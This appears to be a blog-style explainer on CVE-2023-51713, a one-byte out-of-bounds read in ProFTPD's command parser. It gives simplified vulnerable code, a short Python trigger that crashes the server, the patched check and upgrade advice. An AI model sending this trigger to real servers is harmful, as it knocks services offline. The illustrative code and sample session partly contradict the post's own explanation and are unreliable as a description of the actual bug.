Summary:
A critical bug (CVE-2023-51713) was found in ProFTPD, a popular FTP server, before version 1.3.8a. This flaw lies in the make_ftp_cmd function of main.c and allows a one-byte out-of-bounds read, possibly crashing the server. It’s tied to how ProFTPD handles quotes and backslashes in commands. In this post, we’ll break down how it works, show the code, and show you how the vulnerability can be triggered.

What Is ProFTPD?

ProFTPD is an open-source FTP server used by many Linux admins because it’s flexible and easy to configure. Like all network-facing software, it needs secure code—especially because it often runs as a privileged service.

Where’s the Bug?

The problem is in the make_ftp_cmd function. When the server processes incoming FTP commands, this logic is meant to correctly handle quote and escape (\) characters. However, the logic can "look" one byte beyond the end of a buffer—for example, when processing a quote at the very end of a line, or if the command is oddly formatted.

> Key point:
> If ProFTPD looks past the allocated memory, it may read garbage, leak information, or just crash.

Here’s a *simplified* version of what the code looks like around the problem (from main.c)

char *make_ftp_cmd(const char *cmd) {
    while (*p) {
        if (*p == '"' && p[-1] != '\\') {
            // ... some logic
        }
        p++;
    }
}

The vulnerability comes from code that does something like p[-1] without checking that p isn't at the very start of the buffer. If the command begins with a " (quote), and p is pointing to the very first character, p[-1] reads memory *before* the buffer—it’s a "one-byte out-of-bounds read".

How to Exploit the Vulnerability

Triggering the bug is simple:
Send a custom FTP command that starts with a quote and messes with the backslash/quote semantics.

Here’s a possible example FTP session (pseudo)

USER "anonymous
PASS test

ProFTPD tries to parse the command. On the very first ", the code tries to check p[-1]—which is outside legal memory. Depending on compile options and runtime state:

Proof-of-concept in Python

from ftplib import FTP

ftp = FTP('vulnerable-ftp.example.com')
ftp.sendcmd('"USER testuser')  # Starts with a quote!
# Server may hang or drop connection

Impact

This bug (CVE-2023-51713) affects all ProFTPD versions before 1.3.8a. Anyone with *network access* can send a crafted FTP command and may bring the FTP server down. While the bug isn’t known to leak private data, denial-of-service (DoS) is easy.

Affected:

How Was It Fixed?

The fix is to *never* read before the beginning of the buffer. The patch adds a check so the code only reads p[-1] if p != buf (or whatever the start is).

Fixed code

if (p > buf && *p == '"' && p[-1] != '\\') {
    // Safe: p-1 is in-bounds!
}

Patching and Mitigations

If you run ProFTPD:

Upgrade to 1.3.8a or later.

Download the latest ProFTPD

If you cannot upgrade, consider firewalling the FTP port (21) to trusted hosts only.

Reference:
- Official CVE Entry: CVE-2023-51713
- ProFTPD Release Notes

Conclusion

CVE-2023-51713 is a classic example of how tiny code mistakes in string handling can turn into big problems in network servers. Out-of-bounds reads are dangerous, especially in widely-used software.
Upgrading your ProFTPD installation is strongly recommended.

If you want to learn more, check out the ProFTPD GitHub repo to see the code and track new releases.

Timeline

Published on: 12/22/2023 03:15:09 UTC
Last modified on: 01/08/2024 19:06:50 UTC